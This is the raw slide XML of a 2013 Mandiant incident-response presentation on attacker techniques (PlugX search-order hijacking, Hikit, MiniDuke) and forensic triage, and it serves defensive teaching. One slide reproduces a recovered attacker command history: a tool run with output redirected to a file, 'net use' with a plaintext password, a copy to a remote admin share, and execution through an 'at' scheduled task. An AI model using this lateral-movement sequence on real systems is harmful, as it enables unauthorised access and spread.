          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Triangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8938259" y="1208404"/>
            <a:ext cx="182880" cy="228602"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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ight Triangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="1231265"/>
            <a:ext cx="228601" cy="182880"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2136235" y="6410622"/>
            <a:ext cx="2895600" cy="365125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l">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/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6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© Mandiant Corporation. All rights reserved.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent6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1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601592" y="6410622"/>
            <a:ext cx="2061544" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5E8E4241-3A02-CC46-B36E-7394D8EDCFBE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ight Triangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8938258" y="2034540"/>
            <a:ext cx="182880" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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ight Triangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="2057400"/>
            <a:ext cx="228600" cy="182880"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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0" name="Picture 9" descr="Mandiant_title banner.jp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914400"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548741" y="2305905"/>
            <a:ext cx="8046519" cy="1572230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b" anchorCtr="0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500" b="0" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="822433"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial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2" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548741" y="4103680"/>
            <a:ext cx="8046519" cy="64853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charset="2"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial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charset="2"/>
              <a:buNone/>
              <a:defRPr sz="2200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial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charset="2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Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial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charset="2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Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial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charset="2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Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial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13" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459339" y="6410622"/>
            <a:ext cx="2895600" cy="365125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l">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/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6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© Mandiant Corporation. All rights reserved.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent6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601592" y="6410622"/>
            <a:ext cx="2061544" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5E8E4241-3A02-CC46-B36E-7394D8EDCFB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279161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1440"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Triangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8938259" y="1208404"/>
            <a:ext cx="182880" cy="228602"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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ight Triangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="1231265"/>
            <a:ext cx="228601" cy="182880"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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9880" y="1466448"/>
            <a:ext cx="7306919" cy="4864512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle/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601592" y="6410622"/>
            <a:ext cx="2061544" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5E8E4241-3A02-CC46-B36E-7394D8EDCFBE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212328"/>
            <a:ext cx="8229600" cy="914400"/>
          </a:xfrm>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="26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Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Mandiant_logo_KO.png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457200" y="6521032"/>
            <a:ext cx="1566725" cy="237752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2136235" y="6410622"/>
            <a:ext cx="2895600" cy="365125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l">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/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6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© Mandiant Corporation. All rights reserved.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent6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5124529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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout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536580"/>
            <a:ext cx="8229600" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/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79580"/>
            <a:ext cx="8229600" cy="4572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228600" cy="6858000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8915400" y="0"/>
            <a:ext cx="228600" cy="6858000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84" r:id="rId2"/>
    <p:sldLayoutId id="2147483650" r:id="rId3"/>
    <p:sldLayoutId id="2147483652" r:id="rId4"/>
    <p:sldLayoutId id="2147483653" r:id="rId5"/>
    <p:sldLayoutId id="2147483654" r:id="rId6"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="2600" b="0" kern="1200">
          <a:solidFill>
            <a:srgbClr val="822433"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Arial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Clr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:srgbClr val="37424A"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="37424A"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:srgbClr val="37424A"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:srgbClr val="37424A"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:srgbClr val="37424A"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial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536580"/>
            <a:ext cx="8229600" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/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79580"/>
            <a:ext cx="8229600" cy="4572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228600" cy="6858000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8915400" y="0"/>
            <a:ext cx="228600" cy="6858000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631631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3" r:id="rId1"/>
    <p:sldLayoutId id="2147483681" r:id="rId2"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="2600" b="0" kern="1200">
          <a:solidFill>
            <a:srgbClr val="822433"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Arial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Clr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:srgbClr val="37424A"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="37424A"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:srgbClr val="37424A"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:srgbClr val="37424A"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:srgbClr val="37424A"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial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9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comments" Target="../comments/comment1.xml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mandiant.com/blog/dll-search-order-hijacking-revisited/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/blog/hikit-rootkit-advanced-persistent-attack-techniques-part-1-2/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securelist.com/en/blog/208194129%20The_MiniDuke_Mystery_PDF_0_day_Government_Spy_Assembler_Micro_Backdoor" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.alienvault.com/open-threat-exchange/blog/tracking-down-the-author-of-the-plugx-rat" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html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Title 6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A Day in the Life: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stories From the Field</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Content Placeholder 73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en-US" dirty="0" smtClean="0"/>
              <a:t>Mike Scutt, Ryan Benson</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Text Placeholder 7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 smtClean="0"/>
              <a:t>November 25, 2013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But How?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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="C:\Users\mscutt\Documents\City College Preso\4wmod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22475" y="1386708"/>
            <a:ext cx="5087117" cy="50871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645451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Turn-key Search Order Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Legitimate binaries, malicious libraries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Search Order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hijinks - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PlugX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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="C:\Users\mscutt\Documents\City College Preso\wolf-sheeps-clothing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1700" y="2527703"/>
            <a:ext cx="3951436" cy="38032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02406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Signed, Sealed, Delivered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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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96" y="2537122"/>
            <a:ext cx="4701089" cy="1968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7213" y="1388442"/>
            <a:ext cx="3404834" cy="10343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5065815"/>
            <a:ext cx="7950200" cy="7620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365121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Proxy Chaining to Secure Networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious Driver to Monitor Network Traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploitation of Third-Party Component Integration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Advanced Persistent Proxy Chains - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hikit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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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22900" y="2955371"/>
            <a:ext cx="3208739" cy="3455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836486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Custom backdoor written in Assembly (20kb!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unique dropper and campaign ID per host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use of Google and Twitter for c2</a:t>
            </a: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Tiny Terror (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MiniDuke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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="C:\Users\mscutt\Documents\City College Preso\miniduke-twitter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6536" y="3071737"/>
            <a:ext cx="4546600" cy="32417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218145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Let’s Find Some Evil!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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="C:\Users\mscutt\Documents\City College Preso\keep-calm-and-keep-digging-4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300" y="1441460"/>
            <a:ext cx="4191000" cy="4889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479800" y="1466448"/>
            <a:ext cx="5207000" cy="4864512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analyze volatile data first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command line history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DNS cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40298304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Process Listing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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="C:\Users\mscutt\Documents\MIRcon\proc_list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400" y="1387385"/>
            <a:ext cx="6926263" cy="4486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507183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CSRSS or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Conhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Strings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Command Line History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390090" y="2565115"/>
            <a:ext cx="8305800" cy="1938992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r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> \WINDOWS\system32\CMD.EXE - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> \WINDOWS\system32\CMD.EXE - "c:\windows\temp\gs.exe &gt; c:\windows\temp\gs.txt"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> \WINDOWS\system32\CMD.EXE - ping -n 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>fileserv.acmeco</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> \WINDOWS\system32\CMD.EXE - net use \\fileserv M1keR0cks! /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>user:Mike@acmeco</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> \WINDOWS\system32\CMD.EXE - copy gs.exe \\10.199.5.19\c$\windows\temp\a.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> \WINDOWS\system32\CMD.EXE - net time \\fileserv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> \WINDOWS\system32\CMD.EXE - at \\fileserv 16:45 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> /c "c:\windows\temp\a.exe &gt; c:\windows\temp\a.txt"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> \WINDOWS\system32\CMD.EXE - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> \\fileserv\c$\windows\temo\windows\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> \WINDOWS\system32\CMD.EXE - </a:t>
            </a:r>
            <a:r>
